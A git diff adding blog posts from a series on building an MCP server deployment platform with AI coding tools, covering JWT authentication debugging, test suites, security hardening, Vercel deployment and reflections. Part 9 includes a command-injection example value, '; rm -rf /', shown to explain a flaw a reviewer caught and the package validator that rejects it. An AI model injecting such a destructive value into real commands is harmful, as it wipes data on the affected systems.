+export async function createDeployment(data: DeploymentCreate) {
+ const session = await auth(); // Get NextAuth session
+
+ // Generate JWT for backend
+ const jwt = await createBackendAccessToken(session);
+
+ const response = await fetch(
+ `${BACKEND_URL}/api/deployments`,
+ {
+ method: "POST",
+ headers: {
+ "Authorization": `Bearer ${jwt}`,
+ "Content-Type": "application/json"
+ },
+ body: JSON.stringify(data)
+ }
+ );
+
+ return response.json();
+}
+```
+
+### Step 5: Backend JWT Verification
+
+```python
+# backend/app/middleware/auth.py
+from jose import jwt, JWTError
+
+async def verify_jwt_token(token: str) -> User:
+ """
+ Verify JWT token and return user.
+
+ Raises:
+ HTTPException(401) if token invalid
+ """
+ try:
+ payload = jwt.decode(
+ token,
+ settings.AUTH_SECRET,
+ algorithms=["HS256"]
+ )
+
+ user_id = payload.get("userId")
+ if not user_id:
+ raise HTTPException(401, "Invalid token: missing userId")
+
+ # Fetch user from database
+ async with get_session() as db:
+ user = await db.get(User, user_id)
+ if not user:
+ raise HTTPException(401, "User not found")
+
+ return user
+
+ except JWTError:
+ raise HTTPException(401, "Invalid token")
+```
+
+### Step 6: Protected Endpoint
+
+```python
+# backend/app/api/deployments.py
+from app.middleware.auth import get_current_user
+
+@router.post("/deployments")
+async def create_deployment(
+ data: DeploymentCreate,
+ user: User = Depends(get_current_user)
+):
+ """
+ Create deployment (authenticated endpoint).
+
+ The get_current_user dependency:
+ 1. Extracts Authorization header
+ 2. Verifies JWT signature
+ 3. Fetches user from database
+ 4. Returns user object (or raises 401)
+ """
+
+ deployment = Deployment(
+ user_id=user.id, # Associate with authenticated user
+ **data.dict()
+ )
+
+ # ... rest of deployment logic
+```
+
+## The Debugging Methodology
+
+What worked for debugging authentication:
+
+### 1. Logging at Every Step
+
+```python
+# backend/app/middleware/auth.py
+import logging
+logger = logging.getLogger(__name__)
+
+async def verify_jwt_token(token: str) -> User:
+ logger.info(f"Verifying token: {token[:20]}...") # Don't log full token
+
+ try:
+ payload = jwt.decode(...)
+ logger.info(f"Token decoded successfully. User ID: {payload.get('userId')}")
+ # ... rest
+ except JWTError as e:
+ logger.error(f"JWT verification failed: {str(e)}")
+ raise
+```
+
+**This revealed**: "JWT verification failed: Invalid signature" → secrets mismatch
+
+### 2. Manual JWT Decoding
+
+```bash
+# Decode the JWT payload (the second dot-separated segment) without verification
+echo "eyJhbGciOi..." | cut -d '.' -f2 | base64 -d 2>/dev/null | jq
+```
+
+**This revealed**: `userId` field missing → jwt callback not adding it
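+
+Hand-decoding is fiddly because JWT segments strip their base64 padding; a small Python helper that copes (the demo token is built inline and unsigned):
+
+```python
+import base64
+import json
+
+def jwt_payload(token: str) -> dict:
+    """Decode a JWT's payload segment without verifying the signature."""
+    payload_b64 = token.split(".")[1]
+    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
+    return json.loads(base64.urlsafe_b64decode(payload_b64))
+
+def _b64(obj: dict) -> str:
+    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
+
+token = f"{_b64({'alg': 'HS256'})}.{_b64({'userId': '42'})}.fake-sig"
+assert jwt_payload(token)["userId"] == "42"
+```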
+
+### 3. Testing Each Component Separately
+
+```bash
+# Test user sync directly
+curl -X POST https://backend.fly.dev/api/auth/sync-user \
+ -H "X-Auth-Secret: $AUTH_SYNC_SECRET" \
+ -H "Content-Type: application/json" \
+ -d '{"email": "test@example.com", "name": "Test", "provider": "google", "provider_id": "123"}'
+
+# Test JWT verification
+curl https://backend.fly.dev/api/deployments \
+ -H "Authorization: Bearer $JWT"
+```
+
+### 4. Documentation
+
+I created `AUTH_TROUBLESHOOTING.md`:
+
+```markdown
+# Authentication Troubleshooting
+
+## 401 Errors Checklist
+
+1. **Verify secrets match**:
+ - Frontend `.env.local`: `AUTH_SECRET`
+ - Backend Fly.io: `fly secrets list --app catwalk-backend`
+ - Must be IDENTICAL
+
+2. **Check user sync**:
+ - Sign in
+   - Check backend logs: "User synced: <email>"
+ - If missing: `AUTH_SYNC_SECRET` mismatch or network error
+
+3. **Verify JWT payload**:
+   - Decode the payload: `echo $JWT | cut -d '.' -f2 | base64 -d`
+ - Must contain: `{"userId": "..."}`
+
+4. **Check backend logs**:
+ - `fly logs --app catwalk-backend`
+ - Look for: "JWT verification failed"
+```
+
+**This saved me** when the same issue appeared during frontend Vercel deployment.
+
+## What I Learned
+
+### Where AI Helped ✅
+- NextAuth.js setup boilerplate
+- JWT signing/verification code
+- Database user model
+
+### Where AI Failed ❌
+- **Incomplete implementation**: TODOs in production code
+- **Secret management confusion**: Didn't explain AUTH_SECRET vs AUTH_SYNC_SECRET
+- **Error handling**: Generic errors, not actionable
+- **Testing**: No auth flow tests generated
+
+### Human Debugging Required 🧠
+- **Secret synchronization**: AI can't check environment variables across systems
+- **Flow understanding**: Tracking requests through frontend → backend → database
+- **Error interpretation**: "Invalid signature" means secrets mismatch
+- **Documentation**: Creating troubleshooting guides
+
+**The pattern**: AI writes code. Humans debug when code interacts with external systems (OAuth, secrets, databases).
+
+## Up Next
+
+Authentication works! Users can sign in, create deployments, manage their MCP servers.
+
+But the code quality is... questionable. No tests. Security reviews pending. Edge cases unhandled.
+
+Time for **Security Hardening & Production Polish**.
+
+That's Part 8.
+
+---
+
+**Key Commits**:
+- `068dc28` - Implement user settings for API key management
+- `2f42cff` - Implement JWT-based authentication
+- `efbac5c` - Implement JWT authentication and user management with Auth.js
+- `a8dfde6` - Fix 401 errors and add comprehensive authentication troubleshooting
+
+**Related Files**:
+- `frontend/auth.ts` - NextAuth.js configuration
+- `backend/app/middleware/auth.py` - JWT verification
+- `backend/app/api/auth.py` - User sync endpoint
+- `context/AUTH_TROUBLESHOOTING.md` - Debugging guide
+
+**Debugging Resources**:
+- [NextAuth.js Callbacks](https://next-auth.js.org/configuration/callbacks)
+- [JWT Decoder](https://jwt.io/)
+
+**Next Post**: [Part 8: Security Hardening & Production Ready](08-security-hardening-production.md)
diff --git a/blog/08-security-hardening-production.md b/blog/08-security-hardening-production.md
new file mode 100644
index 0000000..8425cf8
--- /dev/null
+++ b/blog/08-security-hardening-production.md
@@ -0,0 +1,612 @@
+---
+title: "Part 8: Security Hardening & Production Ready"
+series: "Catwalk Live Development Journey"
+part: 8
+date: 2025-12-21
+updated: 2025-12-27
+tags: [security, testing, production, hardening, deployment]
+reading_time: "14 min"
+commits_covered: "02f9346...890c67a"
+---
+
+## The Final Push
+
+December 21, 2025. The platform works:
+- ✅ Users can sign in
+- ✅ Analysis extracts MCP config
+- ✅ Validation prevents security holes
+- ✅ Deployments create Fly machines
+- ✅ Claude successfully calls tools
+
+But "works" ≠ "production-ready."
+
+**What's missing**:
+- Tests (we have... zero)
+- Security hardening (beyond basic validation)
+- Error handling for edge cases
+- Production deployment (frontend still localhost only)
+- Performance optimization
+
+Time to go from **"working prototype"** to **"production system"**.
+
+## PR #12: The Testing Blitz
+
+### The Problem
+
+No tests. Not a single one. Every change was tested manually: deploy, click around, check logs.
+
+**This doesn't scale.**
+
+AI (Claude Code) was prompted:
+
+> Write comprehensive integration tests for all API endpoints. Cover:
+> - Health checks
+> - Authentication
+> - Analysis (cache hit/miss)
+> - Deployments (create, list, get)
+> - MCP endpoints
+> - Settings management
+> - Registry search
+
+### The Result: 51 Tests
+
+```python
+# backend/tests/integration/test_api_health.py
+import pytest
+from httpx import AsyncClient
+
+@pytest.mark.asyncio
+async def test_health_endpoint(client: AsyncClient):
+ """Health endpoint should return 200 OK"""
+ response = await client.get("/api/health")
+ assert response.status_code == 200
+ assert response.json() == {"status": "healthy"}
+
+# backend/tests/integration/test_api_analyze.py
+@pytest.mark.asyncio
+async def test_analyze_repo_success(client: AsyncClient):
+ """Analysis should succeed for valid MCP repo"""
+ response = await client.post(
+ "/api/analyze",
+ json={"repo_url": "https://github.com/hong-hao/mcp-ticktick"}
+ )
+ assert response.status_code == 200
+ data = response.json()
+ assert "package" in data
+ assert "env_vars" in data
+
+@pytest.mark.asyncio
+async def test_analyze_cache_hit(client: AsyncClient, mock_claude_api):
+ """Second analysis should hit cache"""
+ repo_url = "https://github.com/hong-hao/mcp-ticktick"
+
+ # First request (cache miss)
+ response1 = await client.post("/api/analyze", json={"repo_url": repo_url})
+ assert mock_claude_api.call_count == 1
+
+ # Second request (cache hit)
+ response2 = await client.post("/api/analyze", json={"repo_url": repo_url})
+ assert mock_claude_api.call_count == 1 # Still 1 (not called again)
+ assert response2.json() == response1.json()
+
+# backend/tests/integration/test_api_deployments.py
+@pytest.mark.asyncio
+async def test_create_deployment_unauthorized(client: AsyncClient):
+ """Creating deployment without auth should return 401"""
+ response = await client.post(
+ "/api/deployments",
+ json={"name": "Test", "repo_url": "..."}
+ )
+ assert response.status_code == 401
+
+@pytest.mark.asyncio
+async def test_create_deployment_success(
+ auth_client: AsyncClient,
+ mock_analysis,
+ mock_fly_api
+):
+ """Authenticated user can create deployment"""
+ response = await auth_client.post(
+ "/api/deployments",
+ json={
+ "name": "My TickTick",
+ "repo_url": "https://github.com/hong-hao/mcp-ticktick",
+ "credentials": {"TICKTICK_TOKEN": "test-token"}
+ }
+ )
+ assert response.status_code == 201
+ data = response.json()
+ assert data["name"] == "My TickTick"
+ assert data["status"] == "deploying"
+ assert "id" in data
+ assert "access_token" in data
+```
+
+**Unit tests for services**:
+
+```python
+# backend/tests/unit/test_registry_service.py
+@pytest.mark.asyncio
+async def test_validate_npm_package_exists():
+    """Should validate existing npm package"""
+    service = RegistryService()
+    result = await service.validate_npm_package("@modelcontextprotocol/sdk")
+    assert result is True
+
+@pytest.mark.asyncio
+async def test_validate_npm_package_not_found():
+    """Should raise error for non-existent package"""
+    service = RegistryService()
+    with pytest.raises(ValidationError, match="not found"):
+        await service.validate_npm_package("@fake/nonexistent-package-xyz")
+
+# backend/tests/unit/test_mcp_process_manager.py
+@pytest.mark.asyncio
+async def test_spawn_process_npm():
+    """Should spawn npm MCP server process"""
+    manager = MCPProcessManager()
+    process = await manager.spawn(
+        package="@modelcontextprotocol/server-filesystem",
+        env={"ALLOWED_DIRECTORIES": "/tmp"}
+    )
+    assert process.returncode is None  # Running
+    await manager.kill(process.pid)
+```
+
+### Test Coverage
+
+```bash
+pytest --cov=app tests/
+
+Coverage Report:
+  app/api/analyze.py         92%
+  app/api/deployments.py     88%
+  app/api/mcp_streamable.py  85%
+  app/services/              91%
+  app/middleware/            94%
+
+  Total: 89%
+```
+
+**89% coverage.** Not perfect, but solid.
+
+### What Tests Caught
+
+Running tests revealed bugs:
+
+1. **Cache expiration bug**: Timezone-aware vs naive datetime comparison
+
+```python
+# Bug: naive datetime compared with a timezone-aware value from the database
+if datetime.now() > cached.expires_at:
+    return None
+
+# Fix: compare timezone-aware datetimes (datetime.utcnow() is also naive)
+if datetime.now(timezone.utc) > cached.expires_at:
+    return None
+```
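A self-contained demonstration of the failure mode — a naive vs. aware comparison raises at runtime, while aware vs. aware works:

```python
from datetime import datetime, timedelta, timezone

# Simulate the timezone-aware expiry the database returns
expires_at = datetime.now(timezone.utc) + timedelta(hours=1)

# Comparing a naive datetime against an aware one raises TypeError
# (datetime.utcnow() is also naive, so it has the same problem)
try:
    datetime.now() > expires_at
    comparison_failed = False
except TypeError:
    comparison_failed = True

assert comparison_failed
# Aware vs. aware works, and the cache entry is correctly still valid
assert not (datetime.now(timezone.utc) > expires_at)
```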
+
+2. **Credential validation bug**: Didn't handle optional env vars correctly
+
+```python
+# Bug: Required all env vars, even optional ones
+missing = [v for v in env_vars if v.name not in credentials]
+
+# Fix: Only check required env vars
+missing = [
+    v for v in env_vars
+    if v.required and v.name not in credentials
+]
+```
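A minimal, runnable version of the corrected check. The `EnvVar` dataclass and the `TICKTICK_REGION` variable are stand-ins for illustration, not the real models:

```python
from dataclasses import dataclass

@dataclass
class EnvVar:
    name: str
    required: bool = True

env_vars = [EnvVar("TICKTICK_TOKEN"), EnvVar("TICKTICK_REGION", required=False)]
credentials = {"TICKTICK_TOKEN": "abc"}

# Only required vars count as missing
missing = [v.name for v in env_vars if v.required and v.name not in credentials]
assert missing == []  # the optional var is no longer reported as missing

# With no credentials supplied, the required var is flagged
missing = [v.name for v in env_vars if v.required and v.name not in {}]
assert missing == ["TICKTICK_TOKEN"]
```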
+
+3. **Deployment background task bug**: Credentials not passed to Fly API
+
+```python
+# Bug: credentials_data undefined in background task scope
+background_tasks.add_task(deploy_to_fly, deployment.id)
+
+# Fix: Pass credentials explicitly
+background_tasks.add_task(
+ deploy_to_fly,
+ deployment.id,
+ credentials_data=credentials
+)
+```
+
+**Lesson**: Tests find bugs that manual testing misses. Always test edge cases.
+
+## PR #13: Security Hardening
+
+### The CodeRabbit Review
+
+After PR #12 merged, CodeRabbit reviewed the entire codebase. Findings:
+
+#### 1. Secrets Leaking in Logs
+
+**Issue**:
+```python
+logger.info(f"Creating deployment: {deployment.dict()}")
+# Logs: {..., "credentials": {"TICKTICK_TOKEN": "secret-value"}}
+```
+
+**Fix**: Filter sensitive fields
+
+```python
+def safe_dict(obj, exclude_fields=("credentials", "access_token", "encrypted_data")):
+    """Convert model to dict, excluding sensitive fields"""
+    data = obj.dict() if hasattr(obj, 'dict') else dict(obj)
+    return {k: v for k, v in data.items() if k not in exclude_fields}
+
+logger.info(f"Creating deployment: {safe_dict(deployment)}")
+# Logs: {..., "name": "My TickTick", "status": "deploying"}  # No secrets
+```
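The filter is easy to sanity-check in isolation (a plain dict takes the `dict(obj)` branch, since it has no `.dict()` method):

```python
def safe_dict(obj, exclude_fields=("credentials", "access_token", "encrypted_data")):
    """Convert model to dict, excluding sensitive fields"""
    data = obj.dict() if hasattr(obj, 'dict') else dict(obj)
    return {k: v for k, v in data.items() if k not in exclude_fields}

record = {"name": "My TickTick", "status": "deploying",
          "credentials": {"TICKTICK_TOKEN": "s3cret"}}
assert safe_dict(record) == {"name": "My TickTick", "status": "deploying"}
```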
+
+#### 2. CORS Misconfiguration
+
+**Issue**:
+```python
+app.add_middleware(
+    CORSMiddleware,
+    allow_origins=["*"],  # Allows ANY origin
+    allow_credentials=True
+)
+```
+
+**Fix**: Restrict to specific origins
+
+```python
+app.add_middleware(
+    CORSMiddleware,
+    allow_origins=[
+        "http://localhost:3000",      # Local dev
+        "https://catwalk.vercel.app"  # Production frontend
+    ],
+    allow_credentials=True
+)
+```
+
+#### 3. MCP Endpoint Access Control
+
+**Issue**: MCP endpoints were public - anyone with the URL could call tools.
+
+**Fix**: Access token authentication
+
+```python
+@router.api_route("/mcp/{deployment_id}", methods=["GET", "POST"])
+async def mcp_streamable(
+    deployment_id: str,
+    request: Request,
+    x_access_token: str | None = Header(None, alias="X-Access-Token")
+):
+    """MCP endpoint with access token auth"""
+    deployment = await get_deployment(deployment_id)
+
+    # Validate access token (constant-time comparison avoids timing attacks)
+    if not x_access_token or not secrets.compare_digest(
+        x_access_token, deployment.access_token
+    ):
+        raise HTTPException(401, "Invalid or missing access token")
+
+    # ... rest of MCP proxying
+```
+
+Claude Desktop config now includes token:
+
+```json
+{
+  "mcpServers": {
+    "ticktick": {
+      "url": "https://backend.fly.dev/api/mcp/{id}",
+      "headers": {
+        "X-Access-Token": "deployment-specific-token"
+      }
+    }
+  }
+}
+```
+
+#### 4. Access Token Rotation
+
+**Issue**: If a token leaks, no way to invalidate it.
+
+**Fix**: Token rotation endpoint
+
+```python
+@router.post("/deployments/{deployment_id}/rotate-token")
+async def rotate_deployment_token(
+    deployment_id: str,
+    user: User = Depends(get_current_user)
+):
+    """
+    Rotate deployment access token.
+
+    Generates new token, invalidates old one.
+    """
+    deployment = await get_deployment(deployment_id)
+
+    # Verify ownership
+    if deployment.user_id != user.id:
+        raise HTTPException(403, "Not your deployment")
+
+    # Generate new token
+    new_token = secrets.token_urlsafe(32)
+    old_token = deployment.access_token
+
+    # Update deployment
+    deployment.access_token = new_token
+    await db.commit()
+
+    # Log rotation for security audit
+    logger.warning(
+        "Access token rotated",
+        extra={
+            "deployment_id": deployment_id,
+            "user_id": user.id,
+            "old_token_prefix": old_token[:8],
+            "new_token_prefix": new_token[:8]
+        }
+    )
+
+    return {"access_token": new_token, "message": "Token rotated successfully"}
+```
+
+**User workflow**:
+1. Token leaked? Click "Rotate Token" in UI
+2. New token generated
+3. Update Claude Desktop config with new token
+4. Old token immediately invalid
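The security properties that make rotation safe come from `secrets.token_urlsafe` itself: tokens are unpredictable, collision-free in practice, and use only header- and URL-safe characters. A quick check of those properties (a sketch mirroring the endpoint above, not the production code verbatim):

```python
import secrets
import string

def generate_access_token() -> str:
    """32 random bytes, base64url-encoded -> a ~43-char URL-safe token."""
    return secrets.token_urlsafe(32)

a, b = generate_access_token(), generate_access_token()
assert a != b                      # independent tokens don't repeat in practice
assert len(a) >= 43                # 256 bits of entropy
allowed = set(string.ascii_letters + string.digits + "-_")
assert set(a) <= allowed           # safe to paste into headers and URLs
```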
+
+### Audit Logging
+
+Added audit trail for security events:
+
+```python
+class AuditLog(Base):
+    __tablename__ = "audit_logs"
+
+    id = Column(UUID, primary_key=True, default=uuid.uuid4)
+    user_id = Column(UUID, ForeignKey("users.id"))
+    action = Column(String)  # "deployment_created", "token_rotated", etc.
+    resource_id = Column(String)
+    timestamp = Column(DateTime, default=datetime.utcnow)
+    # "metadata" is reserved by SQLAlchemy's Declarative base, so map it explicitly
+    event_metadata = Column("metadata", JSON)
+
+# Log security events
+async def log_audit(user_id, action, resource_id, metadata=None):
+    async with get_session() as db:
+        log = AuditLog(
+            user_id=user_id,
+            action=action,
+            resource_id=resource_id,
+            event_metadata=metadata or {}
+        )
+        db.add(log)
+        await db.commit()
+
+# Example usage
+await log_audit(
+    user_id=user.id,
+    action="deployment_created",
+    resource_id=deployment.id,
+    metadata={"package": deployment.schedule_config["mcp_config"]["package"]}
+)
+```
+
+**Why audit logs**: Compliance, security monitoring, debugging.
+
+## Frontend Deployment to Vercel
+
+### The Problem
+
+Frontend ran locally (`localhost:3000`). No production deployment.
+
+**Steps to deploy**:
+
+1. **Environment variables** (Vercel dashboard):
+
+```env
+NEXT_PUBLIC_BACKEND_URL=https://catwalk-backend.fly.dev
+AUTH_SECRET=
+AUTH_SYNC_SECRET=
+GOOGLE_CLIENT_ID=
+GOOGLE_CLIENT_SECRET=
+```
+
+2. **Deploy**: `vercel deploy --prod`
+
+3. **Build failed**:
+
+```
+Error: Cannot find module './vitest.config.mts'
+```
+
+**Problem**: `tsconfig.json` was trying to compile Vitest config (a dev-only file).
+
+**Fix**: Exclude test configs from production build:
+
+```json
+{
+  "exclude": [
+    "node_modules",
+    "**/*.test.ts",
+    "**/*.test.tsx",
+    "**/*.mts"
+  ]
+}
+```
+
+4. **SSR error**: "useSearchParams must be wrapped in Suspense"
+
+**Problem**: SignInModal used `useSearchParams()` without Suspense boundary.
+
+**Fix**:
+
+```tsx
+// app/layout.tsx
+import { Suspense } from 'react'
+import SignInModal from '@/components/auth/SignInModal'
+
+export default function RootLayout({ children }) {
+  return (
+    <html lang="en">
+      <body>
+        <Suspense fallback={null}>
+          <SignInModal />
+        </Suspense>
+        {children}
+      </body>
+    </html>
+  )
+}
+```
+
+5. **Success**: Frontend deployed to Vercel!
+
+**Production URLs**:
+- Frontend: `https://catwalk.vercel.app`
+- Backend: `https://catwalk-backend.fly.dev`
+
+## Performance Optimizations
+
+### 1. Analysis Cache Improvements
+
+**Before**: Cache expiration checked on every request.
+
+**After**: Background cleanup task.
+
+```python
+from apscheduler.schedulers.asyncio import AsyncIOScheduler
+
+scheduler = AsyncIOScheduler()
+
+@scheduler.scheduled_job("interval", hours=1)
+async def cleanup_expired_cache():
+    """Remove expired cache entries (runs every hour)"""
+    async with get_session() as db:
+        await db.execute(
+            delete(AnalysisCache).where(
+                AnalysisCache.expires_at < datetime.now(timezone.utc)
+            )
+        )
+        await db.commit()
+
+# Start scheduler on app startup
+@app.on_event("startup")
+async def startup():
+    scheduler.start()
+```
+
+**Benefit**: Faster queries (no expiration check), database stays clean.
+
+### 2. Registry Validation Concurrency
+
+**Before**: Validate package sequentially.
+
+```python
+# Slow (2 sequential API calls)
+syntax_valid = await validate_syntax(package)
+npm_exists = await validate_npm_package(package)
+```
+
+**After**: Validate concurrently.
+
+```python
+# Fast (parallel validation)
+syntax_valid, npm_exists = await asyncio.gather(
+    validate_syntax(package),
+    validate_npm_package(package)
+)
+```
+
+**Improvement**: 300ms → 150ms average validation time.
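The speedup is easy to demonstrate with stand-in coroutines: two 100 ms awaits take roughly 200 ms sequentially but roughly 100 ms under `asyncio.gather`:

```python
import asyncio
import time

async def fake_check(delay: float) -> bool:
    # Stand-in for a registry API call
    await asyncio.sleep(delay)
    return True

async def main() -> float:
    start = time.monotonic()
    results = await asyncio.gather(fake_check(0.1), fake_check(0.1))
    assert results == [True, True]
    return time.monotonic() - start

elapsed = asyncio.run(main())
assert elapsed < 0.19  # concurrent: ~0.1s total, not 0.2s
```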
+
+### 3. Database Connection Pooling
+
+**Before**: Create new connection per request.
+
+**After**: Connection pool.
+
+```python
+from sqlalchemy.ext.asyncio import create_async_engine
+
+engine = create_async_engine(
+    DATABASE_URL,
+    pool_size=20,        # Max 20 connections
+    max_overflow=10,     # Extra 10 if pool full
+    pool_pre_ping=True,  # Check connection alive before use
+    pool_recycle=3600    # Recycle connections after 1 hour
+)
+```
+
+**Benefit**: Faster queries, fewer connection errors.
+
+## Production Checklist
+
+Before declaring "production-ready":
+
+- [x] **Tests**: 51 integration + unit tests, 89% coverage
+- [x] **Security**: CodeRabbit review passed, secrets masked, CORS restricted
+- [x] **Authentication**: JWT + OAuth, user sync working
+- [x] **Validation**: Package + credential validation
+- [x] **Error handling**: User-friendly messages, audit logging
+- [x] **Deployment**: Backend on Fly.io, frontend on Vercel
+- [x] **Monitoring**: Health checks, structured logs
+- [x] **Documentation**: API docs, troubleshooting guides
+- [x] **Performance**: Caching, connection pooling, concurrent validation
+- [ ] **Health monitoring loop**: Proactive unhealthy state detection (Phase 8)
+
+**Status**: Production-ready (with known gaps documented).
+
+## What I Learned
+
+### Where AI Excelled ✅
+- Test generation (51 tests from prompt)
+- Security patterns (secret filtering, CORS config)
+- Boilerplate (audit logging, schedulers)
+
+### Where AI Failed ❌
+- **Test quality**: Many tests too shallow (only happy path)
+- **Security thinking**: Didn't proactively suggest token rotation
+- **Edge cases**: Didn't catch timezone datetime bug
+- **Deployment**: No guidance on Vercel SSR issues
+
+### Human Expertise Required 🧠
+- **Security review**: Reading CodeRabbit feedback, prioritizing fixes
+- **Test design**: What scenarios matter? What edge cases exist?
+- **Performance tuning**: Where are bottlenecks? How to optimize?
+- **Production deployment**: Environment variables, build configs, SSR
+
+**The pattern**: AI generates code. Humans ensure **production quality**.
+
+## Up Next
+
+The platform is production-ready:
+- ✅ Comprehensive tests
+- ✅ Security hardened
+- ✅ Deployed to production (frontend + backend)
+- ✅ Performance optimized
+
+But this is just **Part 8**. There's one more story to tell: **Reflections on AI-orchestrated development**.
+
+What worked? What didn't? How has AI changed the role of the engineer? What's next?
+
+That's Part 9: The conclusion.
+
+---
+
+**Key Commits**:
+- `02f9346` - Comprehensive API hardening, refactored auth flow, major test suite expansion
+- `690fa1d` - Address security, stability, and logic review feedback
+- `d0766bf` - Fix security: refine logging, restrict cache, fix proxy
+- `27717d1` - PR #12: Testing and cache improvements
+- `937f01e` - PR #13: Security hardening
+- `890c67a` - Access token rotation for deployments
+
+**Related Files**:
+- `backend/tests/` - 51 integration and unit tests
+- `backend/app/middleware/logging.py` - Secret filtering
+- `backend/app/api/deployments.py` - Token rotation endpoint
+
+**Production URLs**:
+- Frontend: https://catwalk.vercel.app
+- Backend: https://catwalk-backend.fly.dev
+
+**Next Post**: [Part 9: Reflections - AI-Orchestrated Development](09-reflections-ai-orchestration.md)
diff --git a/blog/09-reflections-ai-orchestration.md b/blog/09-reflections-ai-orchestration.md
new file mode 100644
index 0000000..d407b53
--- /dev/null
+++ b/blog/09-reflections-ai-orchestration.md
@@ -0,0 +1,528 @@
+---
+title: "Part 9: Reflections - AI-Orchestrated Development"
+series: "Catwalk Live Development Journey"
+part: 9
+date: 2025-12-27
+updated: 2025-12-27
+tags: [AI, reflections, methodology, lessons-learned, future]
+reading_time: "18 min"
+commits_covered: "215deaa...890c67a"
+---
+
+## The Journey in Numbers
+
+December 11-23, 2025. **12 days. 86 commits. 0 lines of code written manually.**
+
+**What was built**:
+- Full-stack deployment platform
+- Next.js 15 frontend (React 19, TailwindCSS 4)
+- FastAPI backend (Python 3.12, async SQLAlchemy)
+- PostgreSQL database (Fly.io)
+- MCP Streamable HTTP implementation (2025-06-18 spec)
+- Fly Machines API integration
+- JWT authentication (NextAuth.js + custom backend)
+- Package validation (npm + PyPI registries)
+- Credential encryption (Fernet)
+- Comprehensive test suite (51 tests, 89% coverage)
+- Production deployment (Vercel + Fly.io)
+
+**The result**: A working platform that deploys MCP servers as easily as deploying to Vercel.
+
+**The method**: Strategic AI orchestration with rigorous human validation.
+
+**The question**: Does this methodology actually work?
+
+## The Central Thesis
+
+**AI can build production systems - but only with the right structure.**
+
+This isn't about "AI writes all the code." It's about **orchestrating multiple AI agents with clear specifications, quality gates, and human oversight**.
+
+Here's what I learned actually works:
+
+### What Worked: The Winning Patterns
+
+#### 1. Prompt Refinement is 80% of Success
+
+**Bad approach**: "Build me a deployment platform for MCP servers"
+
+**Good approach**:
+```
+Build a platform that:
+- Accepts GitHub URLs for MCP servers
+- Uses Claude API (via OpenRouter) with web search to analyze repos
+- Extracts: package name (npm/PyPI), env vars, tools/resources/prompts
+- Generates dynamic credential forms based on extracted requirements
+- Encrypts credentials with Fernet symmetric encryption (256-bit key)
+- Stores deployments in PostgreSQL with async SQLAlchemy
+- Validates package names against npm/PyPI registries (prevent command injection)
+- Deploys to Fly.io Machines API with isolated Firecracker VMs
+- Implements MCP Streamable HTTP transport (2025-06-18 spec)
+- Exposes stable HTTPS endpoints for Claude Desktop
+
+Tech constraints:
+- Frontend: Next.js 15 (App Router), React 19, TypeScript 5+ (no 'any' types)
+- Backend: FastAPI, Python 3.12, psycopg3 (NOT asyncpg), Pydantic 2.0
+- All async (asyncio, async SQLAlchemy)
+- Type-safe throughout
+- Must pass ruff check with zero warnings
+
+Success criteria:
+- End-to-end MCP tool calling works
+- Credentials never logged or exposed
+- Package validation prevents command injection
+- 90%+ test coverage
+```
+
+**The difference**: The detailed prompt produced production-quality code. The vague prompt produced a proof-of-concept that would need complete rewrites.
+
+**Time investment**: 30 minutes refining prompts vs 10+ hours debugging vague AI output.
+
+#### 2. Multi-AI Validation Prevents Blind Spots
+
+Different AI models have different strengths. Cross-validation catches issues.
+
+**Example: PostgreSQL driver choice**
+
+| AI Model | Recommendation | Rationale |
+|----------|----------------|-----------|
+| GPT-4 | asyncpg | "Modern async driver, well-maintained" |
+| Claude | psycopg3 | "Better SSL parameter support" |
+| Gemini | psycopg3 | "More compatible with connection strings" |
+
+**Consensus**: psycopg3 (2 out of 3)
+
+**Result**: Correct choice. asyncpg failed with Fly.io's `sslmode` parameter.
+
+**Pattern**: Where AI models agree → probably good design. Where they disagree → investigate carefully.
+
+#### 3. Context Files Enable Multi-Session Consistency
+
+AI has limited context windows. Without external memory, architectural decisions get forgotten across sessions.
+
+**The solution**: Structured markdown files as "source of truth":
+
+```
+context/
+├── CURRENT_STATUS.md # Where we are, what's next
+├── ARCHITECTURE.md # System design decisions
+├── TECH_STACK.md # Technology choices + rationale
+├── API_SPEC.md # Endpoint documentation
+└── CLAUDE.md # Known pitfalls, lessons learned
+```
+
+**Example from CLAUDE.md**:
+```markdown
+## PostgreSQL Driver Issues
+
+CRITICAL: Use psycopg3, NOT asyncpg.
+
+Fly.io provides URLs like: postgres://user:pass@host?sslmode=disable
+asyncpg does NOT support 'sslmode' parameter → crashes.
+
+Solution: Use psycopg[binary]>=3.1.0 + URL transformer in config.py:
+...
+```
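The transformer itself is elided in the file above; a hypothetical sketch of what such a helper can look like (the name `to_async_url` is illustrative, not the project's actual code):

```python
def to_async_url(url: str) -> str:
    """Rewrite a Fly.io-style postgres:// URL for SQLAlchemy's psycopg3 driver."""
    if url.startswith("postgres://"):
        url = "postgresql+psycopg://" + url[len("postgres://"):]
    return url

assert to_async_url("postgres://user:pass@host/db?sslmode=disable") == (
    "postgresql+psycopg://user:pass@host/db?sslmode=disable"
)
```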
+
+**Impact**: Without these files, AI tried asyncpg again in session 3. With the file, it immediately used psycopg3.
+
+**The insight**: Context engineering is as important as prompt engineering.
+
+#### 4. Automated Quality Gates Catch What Humans Miss
+
+GitHub agent pipeline:
+1. **CodeRabbit**: Security vulnerabilities (found command injection risk)
+2. **Qodo**: Edge cases and error handling
+3. **Gemini Code Assist**: Code quality and best practices
+4. **Greptile**: Integration consistency
+
+**Example: CodeRabbit caught command injection**
+
+AI-generated code:
+```python
+env = {"MCP_PACKAGE": mcp_package} # User input, unsanitized!
+```
+
+Exploit:
+```python
+mcp_package = "; rm -rf /"
+# Executes: npx -y ; rm -rf /
+```
+
+**CodeRabbit flagged this** → I added package validation against registries.
+
+**Human alone**: Might have missed this.
+**AI alone**: Generated the vulnerability.
+**AI + automated review**: Caught and fixed it.
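The fix boils down to validating the package name against the registry's naming rules before it can ever reach a shell. A simplified validator along those lines (the real npm grammar has more corner cases than this sketch covers):

```python
import re

# Simplified npm rules: optional @scope/, then lowercase letters,
# digits, ".", "_", and "-"; max 214 characters
NPM_NAME_RE = re.compile(r"^(@[a-z0-9][a-z0-9._-]*/)?[a-z0-9][a-z0-9._-]*$")

def is_valid_npm_name(name: str) -> bool:
    return len(name) <= 214 and NPM_NAME_RE.fullmatch(name) is not None

assert is_valid_npm_name("@modelcontextprotocol/sdk")
assert is_valid_npm_name("mcp-ticktick")
assert not is_valid_npm_name("; rm -rf /")                # the exploit above is rejected
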